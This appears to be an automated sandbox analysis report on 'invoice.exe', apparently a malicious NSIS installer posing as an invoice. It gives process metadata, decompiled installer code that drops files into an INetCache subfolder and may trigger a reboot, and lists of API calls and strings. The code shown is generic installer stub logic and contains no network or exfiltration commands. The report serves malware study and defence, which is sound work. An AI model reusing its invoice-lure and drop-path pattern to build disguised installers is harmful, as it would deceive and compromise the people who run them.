Analysis Process: conhost.exePID: 2356, Parent PID: 1520

General

Target ID:	6
Start time:	14:34:15
Start date:	17/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d18e0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4620, Parent PID: 1520

General

Target ID:	9
Start time:	14:34:34
Start date:	17/03/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2544
Imagebase:	0x3f0000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: invoice.exePID: 4636, Parent PID: 4588COMMON

Execution Graph

Execution Coverage:	22.8%
Dynamic/Decrypted Code Coverage:	14.2%
Signature Coverage:	21.4%
Total number of Nodes:	1480
Total number of Limit Nodes:	46

Executed Functions

Function 004031F1 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 368
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				int _t67;
				signed int _t68;
				int _t69;
				signed int _t71;
				void* _t95;
				signed int _t111;
				void* _t114;
				void* _t119;
				intOrPtr* _t120;
				char _t123;
				signed int _t142;
				signed int _t143;
				int _t151;
				void* _t152;
				intOrPtr* _t154;
				CHAR* _t157;
				CHAR* _t158;
				void* _t160;
				char* _t161;
				void* _t164;
				void* _t165;
				char _t190;

				 *(_t165 + 0x18) = 0;
				 *((intOrPtr*)(_t165 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t165 + 0x20) = 0;
				 *(_t165 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f40c = _t42;
				if(_t42 != 6) {
					_t120 = E004062FD(0);
					if(_t120 != 0) {
						 *_t120(0xc00);
					}
				}
				_t157 = "UXTHEME";
				do {
					E0040628F(_t157); // executed
					_t157 =  &(_t157[lstrlenA(_t157) + 1]);
				} while ( *_t157 != 0);
				E004062FD(0xa);
				 *0x42f404 = E004062FD(8);
				_t47 = E004062FD(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f40f =  *0x42f40f | 0x00000040;
					}
				}
				__imp__#17(_t160);
				__imp__OleInitialize(0); // executed
				 *0x42f4d8 = _t47;
				SHGetFileInfoA(0x429830, 0, _t165 + 0x38, 0x160, 0); // executed
				E00405F65("Yllerion Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t161 = "\"C:\\Users\\Arthur\\Desktop\\invoice.exe\"";
				E00405F65(_t161, _t51);
				 *0x42f400 = GetModuleHandleA(0);
				_t54 = _t161;
				if("\"C:\\Users\\Arthur\\Desktop\\invoice.exe\"" == 0x22) {
					 *(_t165 + 0x14) = 0x22;
					_t54 =  &M00435001;
				}
				_t56 = CharNextA(E00405928(_t54,  *(_t165 + 0x14)));
				 *(_t165 + 0x1c) = _t56;
				while(1) {
					_t123 =  *_t56;
					_t173 = _t123;
					if(_t123 == 0) {
						break;
					}
					__eflags = _t123 - 0x20;
					if(_t123 != 0x20) {
						L13:
						__eflags =  *_t56 - 0x22;
						 *(_t165 + 0x14) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *(_t165 + 0x14) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L25:
							_t56 = E00405928(_t56,  *(_t165 + 0x14));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 != 0x53) {
								L20:
								__eflags =  *_t56 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t56 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t56 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t56 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t56 - 2)) = 0;
										__eflags =  &(_t56[2]);
										E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository",  &(_t56[2]));
										L30:
										_t158 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t158);
										_t60 = E004031C0(_t173);
										_t174 = _t60;
										if(_t60 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t62 = E00402D48(_t176,  *(_t165 + 0x20)); // executed
											 *((intOrPtr*)(_t165 + 0x10)) = _t62;
											if(_t62 != 0) {
												L43:
												E004036DB();
												__imp__OleUninitialize();
												_t186 =  *((intOrPtr*)(_t165 + 0x10));
												if( *((intOrPtr*)(_t165 + 0x10)) == 0) {
													__eflags =  *0x42f4b4;
													if( *0x42f4b4 == 0) {
														L67:
														_t64 =  *0x42f4cc;
														__eflags = _t64 - 0xffffffff;
														if(_t64 != 0xffffffff) {
															 *(_t165 + 0x14) = _t64;
														}
														ExitProcess( *(_t165 + 0x14));
													}
													_t67 = OpenProcessToken(GetCurrentProcess(), 0x28, _t165 + 0x18);
													__eflags = _t67;
													_t151 = 2;
													if(_t67 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t165 + 0x24);
														 *(_t165 + 0x38) = 1;
														 *(_t165 + 0x44) = _t151;
														AdjustTokenPrivileges( *(_t165 + 0x2c), 0, _t165 + 0x28, 0, 0, 0);
													}
													_t68 = E004062FD(4);
													__eflags = _t68;
													if(_t68 == 0) {
														L65:
														_t69 = ExitWindowsEx(_t151, 0x80040002);
														__eflags = _t69;
														if(_t69 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t71;
														if(_t71 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405681( *((intOrPtr*)(_t165 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f420 == 0) {
												L42:
												 *0x42f4cc =  *0x42f4cc | 0xffffffff;
												 *(_t165 + 0x18) = E004037B5( *0x42f4cc);
												goto L43;
											}
											_t154 = E00405928(_t161, 0);
											if(_t154 < _t161) {
												L39:
												_t183 = _t154 - _t161;
												 *((intOrPtr*)(_t165 + 0x10)) = "Error launching installer";
												if(_t154 < _t161) {
													_t152 = E004055EC(_t186);
													lstrcatA(_t158, "~nsu");
													if(_t152 != 0) {
														lstrcatA(_t158, "A");
													}
													lstrcatA(_t158, ".tmp");
													_t163 = "C:\\Users\\Arthur\\Desktop";
													if(lstrcmpiA(_t158, "C:\\Users\\Arthur\\Desktop") != 0) {
														_push(_t158);
														if(_t152 == 0) {
															E004055CF();
														} else {
															E00405552();
														}
														SetCurrentDirectoryA(_t158);
														_t190 = "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository"; // 0x43
														if(_t190 == 0) {
															E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository", _t163);
														}
														E00405F65(0x430000,  *(_t165 + 0x1c));
														_t138 = "A";
														_t164 = 0x1a;
														 *0x430400 = "A";
														do {
															E00405F87(0, 0x429430, _t158, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x120)));
															DeleteFileA(0x429430);
															if( *((intOrPtr*)(_t165 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\invoice.exe", 0x429430, ?str?) != 0) {
																E00405D44(_t138, 0x429430, 0);
																E00405F87(0, 0x429430, _t158, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x124)));
																_t95 = E00405604(0x429430);
																if(_t95 != 0) {
																	CloseHandle(_t95);
																	 *((intOrPtr*)(_t165 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t164 = _t164 - 1;
														} while (_t164 != 0);
														E00405D44(_t138, _t158, 0);
													}
													goto L43;
												}
												 *_t154 = 0;
												_t155 = _t154 + 4;
												if(E004059EB(_t183, _t154 + 4) == 0) {
													goto L43;
												}
												E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository", _t155);
												E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship", _t155);
												 *((intOrPtr*)(_t165 + 0x10)) = 0;
												goto L42;
											}
											_t111 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t154 != _t111) {
												_t154 = _t154 - 1;
												if(_t154 >= _t161) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t158, 0x3fb);
										lstrcatA(_t158, "\\Temp");
										_t114 = E004031C0(_t174);
										_t175 = _t114;
										if(_t114 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t158);
										lstrcatA(_t158, "Low");
										SetEnvironmentVariableA("TEMP", _t158);
										SetEnvironmentVariableA("TMP", _t158);
										_t119 = E004031C0(_t175);
										_t176 = _t119;
										if(_t119 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t142 = _t56[4];
								__eflags = _t142 - 0x20;
								if(_t142 == 0x20) {
									L23:
									_t15 = _t165 + 0x20;
									 *_t15 =  *(_t165 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t142;
								if(_t142 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t143 = _t56[1];
							__eflags = _t143 - 0x20;
							if(_t143 == 0x20) {
								L19:
								 *0x42f4c0 = 1;
								goto L20;
							}
							__eflags = _t143;
							if(_t143 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403201
0x00403205
0x0040320d
0x00403211
0x00403216
0x00403222
0x0040322b
0x00403230
0x00403233
0x0040323a
0x00403241
0x00403241
0x0040323a
0x00403243
0x00403248
0x00403249
0x00403255
0x00403259
0x0040325f
0x0040326d
0x00403272
0x00403279
0x0040327d
0x00403281
0x00403283
0x00403283
0x00403281
0x0040328b
0x00403292
0x00403298
0x004032ae
0x004032be
0x004032c3
0x004032c9
0x004032d0
0x004032e3
0x004032e8
0x004032ea
0x004032ec
0x004032f1
0x004032f1
0x00403301
0x00403307
0x004033d0
0x004033d0
0x004033d2
0x004033d4
0x00000000
0x00000000
0x00403310
0x00403313
0x0040331b
0x0040331b
0x0040331e
0x00403323
0x00403325
0x00403325
0x00403326
0x00403326
0x0040332b
0x0040332e
0x004033c0
0x004033c5
0x004033ca
0x004033cd
0x004033cf
0x004033cf
0x004033cf
0x00000000
0x00403334
0x00403334
0x00403335
0x00403338
0x00403350
0x0040337b
0x0040337d
0x00403390
0x004033bb
0x004033be
0x004033dc
0x004033df
0x004033e8
0x004033ed
0x004033f3
0x004033fe
0x00403400
0x00403405
0x00403407
0x0040345f
0x00403464
0x0040346e
0x00403475
0x00403479
0x0040350d
0x0040350d
0x00403512
0x00403518
0x0040351d
0x00403641
0x00403647
0x004036c3
0x004036c3
0x004036c8
0x004036cb
0x004036cd
0x004036cd
0x004036d5
0x004036d5
0x00403657
0x0040365f
0x00403661
0x00403662
0x0040366f
0x00403682
0x0040368a
0x0040368e
0x0040368e
0x00403696
0x0040369b
0x004036a2
0x004036b0
0x004036b2
0x004036b8
0x004036ba
0x00000000
0x00000000
0x00000000
0x004036a4
0x004036aa
0x004036ac
0x004036ae
0x004036bc
0x004036be
0x00000000
0x004036be
0x00000000
0x004036ae
0x004036a2
0x0040352c
0x00403533
0x00403533
0x00403485
0x004034fd
0x004034fd
0x00403509
0x00000000
0x00403509
0x0040348e
0x00403492
0x004034c8
0x004034c8
0x004034ca
0x004034d2
0x00403544
0x00403546
0x0040354d
0x00403555
0x00403555
0x00403560
0x00403565
0x00403574
0x00403578
0x00403579
0x00403582
0x0040357b
0x0040357b
0x0040357b
0x00403588
0x0040358e
0x00403594
0x0040359c
0x0040359c
0x004035aa
0x004035af
0x004035c1
0x004035c9
0x004035cf
0x004035db
0x004035e1
0x004035eb
0x00403601
0x00403612
0x00403618
0x0040361f
0x00403622
0x00403628
0x00403628
0x0040361f
0x0040362c
0x00403632
0x00403632
0x00403637
0x00403637
0x00000000
0x00403574
0x004034d4
0x004034d6
0x004034e1
0x00000000
0x00000000
0x004034e9
0x004034f4
0x004034f9
0x00000000
0x004034f9
0x004034bd
0x004034bf
0x004034c3
0x004034c6
0x00000000
0x00000000
0x00000000
0x004034c6
0x00000000
0x004034bf
0x0040340f
0x0040341b
0x00403420
0x00403425
0x00403427
0x00000000
0x00000000
0x0040342f
0x00403437
0x00403448
0x00403450
0x00403452
0x00403457
0x00403459
0x00000000
0x00000000
0x00000000
0x00403459
0x00000000
0x004033be
0x0040337f
0x00403382
0x00403385
0x0040338b
0x0040338b
0x0040338b
0x0040338b
0x00000000
0x0040338b
0x00403387
0x00403389
0x00000000
0x00000000
0x00000000
0x00403389
0x0040333a
0x0040333d
0x00403340
0x00403346
0x00403346
0x00000000
0x00403346
0x00403342
0x00403344
0x00000000
0x00000000
0x00000000
0x00403344
0x00000000
0x00000000
0x00000000
0x00403315
0x00403315
0x00403315
0x00403316
0x00403316
0x00000000
0x00403315
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403216
GetVersion.KERNEL32 ref: 0040321C
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
OleInitialize.OLE32(00000000), ref: 00403292
SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
GetCommandLineA.KERNEL32(Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\invoice.exe",00000000,?,00000006,00000008,0000000A), ref: 004032D6
CharNextA.USER32(00000000,"C:\Users\user\Desktop\invoice.exe",00000020,?,00000006,00000008,0000000A), ref: 00403301
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403437
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403464

Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A

Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72

Part of subcall function 004037B5: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository,1033,Yllerion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Yllerion Setup: Installing,00000000,00000002,76793410), ref: 004038A5
Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(Call), ref: 004038C3
Part of subcall function 004037B5: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository), ref: 0040390C
Part of subcall function 004037B5: RegisterClassA.USER32(0042EBA0), ref: 00403949

Part of subcall function 004036DB: CloseHandle.KERNEL32(000002A4,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
ExitProcess.KERNEL32 ref: 00403533
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
OpenProcessToken.ADVAPI32(00000000), ref: 00403657
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
ExitProcess.KERNEL32 ref: 004036D5

Part of subcall function 00405681: MessageBoxIndirectA.USER32(0040A218), ref: 004056DC

Strings

Error launching installer, xrefs: 004034CA
", xrefs: 00403326
UXTHEME, xrefs: 00403243, 00403248, 0040324E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship, xrefs: 004034EF
C:\Users\user\Desktop\invoice.exe, xrefs: 004035F0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository, xrefs: 004033E3, 004034E4, 0040358E, 00403597
TMP, xrefs: 0040344B
"C:\Users\user\Desktop\invoice.exe", xrefs: 004032C9, 004032CF, 00403488
~nsu, xrefs: 0040353E
Yllerion Setup, xrefs: 004032B9
`Kzv, xrefs: 0040343C
SeShutdownPrivilege, xrefs: 00403669
C:\Users\user\AppData\Local\Temp\, xrefs: 004033F3, 004033F8, 0040340E, 0040341A, 00403429, 00403436, 00403442, 0040344A, 00403543, 00403554, 0040355F, 0040356B, 00403578, 00403587, 00403636
C:\Users\user\Desktop, xrefs: 00403565, 0040356A, 00403596
Low, xrefs: 00403431
.tmp, xrefs: 0040355A
TEMP, xrefs: 00403443
\Temp, xrefs: 00403415
NSIS Error, xrefs: 004032B4
1033, xrefs: 0040345F

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\invoice.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\invoice.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Yllerion Setup$\Temp$`Kzv$~nsu
API String ID: 3855923921-430490803
Opcode ID: b823c1f3407b5428210c909c51c2acc25d2a7094c9d0c145c1e4b304f3d6dece
Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
Opcode Fuzzy Hash: b823c1f3407b5428210c909c51c2acc25d2a7094c9d0c145c1e4b304f3d6dece
Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E

Uniqueness

Uniqueness Score: -1.00%

Function 004051CA Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004051CA(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ebe4; // 0x103c2
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E0040515E, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						CloseHandle(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, "true", E00405F87(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a870;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData("true", _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebcc - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f408, 8);
							__eflags =  *0x42f4ac - _t150;
							if( *0x42f4ac == _t150) {
								_t113 =  *0x42a048; // 0x67d2e4
								_t55 = _t113 + 0x34; // 0xffffffd4
								E0040508C( *_t55, _t150);
							}
							E00403FFF("true");
							goto L25;
						}
						 *0x429c40 = 2;
						E00403FFF(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040408D(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebd0, _t150);
						ShowWindow(_v8, 8);
						E0040405B(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f414;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebd0 = GetDlgItem(_a4, 0x403);
				 *0x42ebc8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ebe4 = _t128;
				_v8 = _t128;
				E0040405B( *0x42ebd0);
				 *0x42ebd4 = E0040492A(4);
				 *0x42ebec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404026(_a4);
				if(( *0x42f41c & 0x00000003) != 0) {
					ShowWindow( *0x42ebd0, _t150);
					if(( *0x42f41c & 0x00000002) != 0) {
						 *0x42ebd0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040405B( *0x42ebc8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f41c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x004051d0
0x004051d8
0x004051db
0x004051e3
0x004051e6
0x00405375
0x0040537b
0x00405398
0x0040539f
0x0040539f
0x004053ab
0x004053b1
0x004053d3
0x004053d3
0x004053d9
0x0040542e
0x0040542e
0x00405431
0x00000000
0x00000000
0x00405433
0x00405436
0x00405439
0x00000000
0x00000000
0x00405443
0x00405449
0x0040544b
0x0040544e
0x0040554b
0x00000000
0x0040554b
0x0040545d
0x00405469
0x00405472
0x00405479
0x0040547d
0x00405480
0x00405489
0x0040548f
0x00405492
0x00405492
0x004054a2
0x004054a8
0x004054ab
0x004054b6
0x004054b6
0x004054b7
0x004054ba
0x004054c1
0x004054c8
0x004054d0
0x004054d0
0x004054de
0x004054e4
0x004054e7
0x004054e7
0x004054ee
0x004054f4
0x004054fd
0x00405504
0x0040550d
0x0040550f
0x00405512
0x00405521
0x00405523
0x00405526
0x00405527
0x0040552a
0x0040552b
0x0040552c
0x0040552c
0x00405534
0x0040553f
0x00405545
0x00405545
0x00000000
0x004054ab
0x004053db
0x004053e1
0x0040540f
0x00405411
0x00405417
0x00405419
0x0040541f
0x00405422
0x00405422
0x00405429
0x00000000
0x00405429
0x004053e5
0x004053ef
0x00000000
0x004053b3
0x004053b3
0x004053b9
0x004053f4
0x00000000
0x004053fb
0x004053c2
0x004053c9
0x004053ce
0x00000000
0x004053ce
0x004053b1
0x004051ec
0x004051f0
0x004051f8
0x004051fc
0x004051ff
0x00405202
0x00405205
0x00405208
0x00405209
0x0040520a
0x00405223
0x00405226
0x00405230
0x0040523f
0x00405247
0x0040524f
0x00405254
0x00405257
0x00405263
0x0040526c
0x00405275
0x00405297
0x0040529d
0x004052ae
0x004052b3
0x004052c1
0x004052cf
0x004052cf
0x004052d4
0x004052e2
0x004052e2
0x004052e7
0x004052ea
0x004052ef
0x004052fb
0x00405304
0x00405311
0x00405320
0x00405313
0x00405318
0x00405318
0x0040532c
0x0040532c
0x00405340
0x00405349
0x00405352
0x00405362
0x0040536e
0x0040536e
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405229
GetDlgItem.USER32(?,000003EE), ref: 00405238
GetClientRect.USER32(?,?), ref: 00405275
GetSystemMetrics.USER32(00000002), ref: 0040527C
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
